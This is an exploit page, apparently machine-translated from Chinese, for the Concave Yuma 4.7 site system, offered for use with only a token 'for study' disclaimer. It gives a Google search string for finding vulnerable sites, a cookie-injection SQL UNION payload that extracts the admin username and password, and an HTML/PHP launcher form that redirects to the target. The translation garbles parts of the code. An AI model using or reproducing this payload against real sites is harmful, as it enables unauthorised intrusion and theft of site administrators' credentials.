0-day removal for Concave Yuma 4.7 and earlier versions

EXP:

<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">
<Title> -hi.baidu.com/5427518-</title>
</Head>
<Style type = "text/css">
<! --
. STYLE1 {font-size: 13px; font-family: Arial, Helvetica, sans-serif}
-->
</Style>
<Span class = "STYLE1"> Xday removal in concave yya 4.7 and earlier versions <br> only for study, if the user violates the law, the user shall be at your own risk <br> Note: <br>
0. google: inurl:/otype. asp? Classid = <br>
1. type the target site. If you are not surprised, you will wait for a while. We recommend that you drink tea when the script times out. <Br>
2. Enter the following code in the address bar to perform JavaScript hijack. <Br>
3. Refresh once, right-click to view the source file, and the user name and password will pop up. <Br>
4. If your RP is not good, you should clean up the cookies and try again. <Br>
5. If oyaya. asp is not available, it is likely that the target site version is earlier than 4.7, and the old version directly injects cookies. <Br>
<Font color = red>
Javascript: alert (document. cookie = "n =" + escape ("2 1 as id, 2 as title, admin & password as oStyle, 4, 5, 6, 7, 8, 9 from admin union all select top 1 "));
</Font>
<Form action = "" method = "post" enctype = "multipart/form-data" class = "STYLE1">
<Br>
If you are ready, enter it! Example: www.hackqing.cn <br>
Target site: <input type = "text" name = "a"/>
<Input type = "submit" name = "submit" value = "submit"/> <br>
Backend backup and iis resolution.
</Form> </span>
<Span class = "STYLE1">
<? Php
If (! Empty ($ _ POST [a])
{
Header ("Location: http: //". $ _ POST [a]. "/oyaya. asp ");
}
?> </Span>

Save the preceding code as htm or html